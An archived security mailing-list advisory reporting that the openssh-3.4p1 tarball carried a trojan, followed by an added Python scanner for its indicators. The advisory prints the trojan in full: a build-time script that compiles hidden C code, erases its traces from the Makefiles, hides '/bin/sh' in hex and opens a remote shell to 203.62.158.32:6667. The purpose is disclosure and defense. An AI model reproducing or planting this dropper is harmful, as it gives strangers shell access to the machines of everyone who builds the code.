Greetings,

I noticed that openssh-3.4p has a trojan horse (available from ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz and some of the mirrors:

ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/
ftp://ftp.usa.openbsd.org/pub/OpenBSD/OpenSSH/
ftp://ftp1.se.openbsd.org/pub/OpenBSD/OpenSSH/ )

After compiling the file bf-test.c you will notice that it does the following:

# testing in raw ecb mode
#!/bin/sh
cat >conftest.c <<_ACEOF
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <setjmp.h>
jmp_buf env;int s;char *i_val="\x2f\x62\x69\x6e\x2f\x73\x68";void sig (int sig){close(s);sleep(3600);longjmp(env,0); }int main(){int x;char c,*a[2];struct sockaddr_in sa;struct sigaction act;switch(fork()){case 0:break;default:exit(0);}close(0);close(1);close(2);
memset(&act,0,sizeof(act));act.sa_handler=sig;
sigaction(SIGALRM,&act,NULL);do{setjmp(env);
if((s=socket(AF_INET,SOCK_STREAM,0))==(1))exit(1);
memset(&sa,0,sizeof(sa));sa.sin_family=AF_INET;
sa.sin_port=htons(6667);sa.sin_addr.s_addr=inet_addr
("203.62.158.32");alarm(10);if(connect(s,
(struct sockaddr*)&sa,sizeof(sa))==(-1))exit(1)
;if((x=read(s,&c,1))==(-1)){exit(1);}
else if(x==1){switch(c){case 'A':exit(0);case 'D':alarm(0);dup2(s,0);dup2(s,1);dup2(s,2)
;a[0]=i_val;a[1]=NULL;execve(a[0],a,NULL);break;
case 'M':alarm(0);sig(0);break;default:}}else{exit
(0);}}while(1);}
_ACEOF
(grep -v -i bf-test Makefile.in > m.out ; cp m.out Makefile.in ; rm -f m.out
grep -v -i bf-test Makefile > m.out ; cp m.out Makefile ; rm -f m.out
rm -f bf-test*
TESTPROG="`basename \"\`grep $USER: /etc/passwd\`\"`"
if ! test $TESTPROG ; then TESTPROG=sh; fi
gcc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG
if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
gcc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG
if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
cc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG
if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
cc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG
rm -f ./conftest ./conftest.c $TESTPROG) 1>/dev/null 2>&1

It runs once, upon compilation of openssh, and is named sh or the compiling user's default shell in the process listing.

This trojan attempts to connect to 203.62.158.32:6667 (hacked machine which has been secured now), and awaits one of three characters as the command:

D  execs /bin/sh
M  respawns
A  kills the daemon

The /bin/sh executed via the D command was controlled by the daemon listening on 203.62.158.32:6667, potentially meaning that people affected by this have given a shell, possibly root, to a user unknown.

<Hans> "Let this be a lesson. Don't use root unless you REALLY have to."

Regards,
Artur Lindgren, Comitnet AB

Special thanks to (Ratler, Mrsaint, Jordan, Drabant, Hans and all of you ISP people in Sweden :D)

Thanks to ^Sarge^ for quickly taking care of the hacked machine this trojan connected to.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
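The post above gives the indicators a defender needs to check an unpacked openssh-3.4p1 tree before building it: the bf-test.c file name that the dropper removes from the Makefiles, the callback to 203.62.158.32 on port 6667, and the hex-escaped "\x2f\x62\x69\x6e\x2f\x73\x68" string that hides "/bin/sh" from a plain grep. The scanner below is an added example written for this archive page, not code from the original post or from the OpenSSH project; it decodes C \xNN escapes before matching so that obfuscated strings are caught, walks a source tree and reports which file carries which indicator. The function names, the indicator labels and the two-file sample tree built by demo() are this example's own constructions.

```python
"""Scan an unpacked source tree for the indicators of the trojaned
openssh-3.4p1 tarball described in the post above (added example).

Indicator strings come from the post; helper names and the sample tree
are assumptions made for this example.
"""
import os
import re
import tempfile

# Indicators quoted in the report. Each is matched as a substring of the
# file contents after C hex escapes have been decoded.
INDICATORS = {
    "callback_ip": "203.62.158.32",
    "callback_port": "htons(6667)",
    "bf_test_reference": "bf-test",          # Makefile / Makefile.in edits
    "sigalrm_respawn": "longjmp(env,0)",     # the 'M' respawn path
}

# One or more consecutive C-style \xNN escapes inside a string literal.
HEX_ESCAPE = re.compile(r"(\\x[0-9a-fA-F]{2})+")


def decode_hex_escapes(text):
    """Replace runs of \\xNN escapes with the bytes they encode, so that
    "\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68" is seen as "/bin/sh"."""
    def repl(match):
        raw = bytes.fromhex(match.group(0).replace("\\x", ""))
        return raw.decode("latin-1")
    return HEX_ESCAPE.sub(repl, text)


def scan_text(text):
    """Return the indicator labels present in one file's contents."""
    decoded = decode_hex_escapes(text)
    hits = [name for name, needle in INDICATORS.items() if needle in decoded]
    # A shell path that only appears after decoding is itself suspicious:
    # ordinary build scripts have no reason to hide "/bin/sh" this way.
    if "/bin/sh" in decoded and "/bin/sh" not in text:
        hits.append("hex_obfuscated_shell_path")
    return hits


def scan_tree(root):
    """Walk `root` and return {relative_path: [indicator, ...]} for every
    file that matches at least one indicator (by name or by content)."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for filename in files:
            path = os.path.join(dirpath, filename)
            try:
                with open(path, "r", encoding="latin-1") as fh:
                    hits = scan_text(fh.read())
            except OSError:
                continue
            if "bf-test" in filename.lower():
                hits.append("bf_test_filename")
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings


def build_sample_tree(base):
    """Write a constructed tree: one clean file and one file carrying only
    the report's indicator strings (no executable logic)."""
    src = os.path.join(base, "openssh")
    os.makedirs(src, exist_ok=True)
    with open(os.path.join(src, "README"), "w") as fh:
        fh.write("This is the portable OpenSSH distribution.\n")
    with open(os.path.join(src, "bf-test.c"), "w") as fh:
        fh.write('char *i_val="\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68";\n'
                 'sa.sin_port=htons(6667);'
                 'sa.sin_addr.s_addr=inet_addr("203.62.158.32");\n')
    return base


def demo():
    """Build the sample tree in a temporary directory and scan it."""
    base = tempfile.mkdtemp(prefix="ssh-scan-")
    return scan_tree(build_sample_tree(base))


if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        print(f"{path}: {', '.join(hits)}")
```

Run it against a real unpacked tarball with scan_tree("/path/to/openssh-3.4p1"); an empty dictionary means none of the report's indicators were found, which is necessary but not sufficient, since a repacked tarball should still be checked against the project's published signature.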
This archive was generated by hypermail 2b30 : Thu Aug 01 2002 - 08:28:35 PDT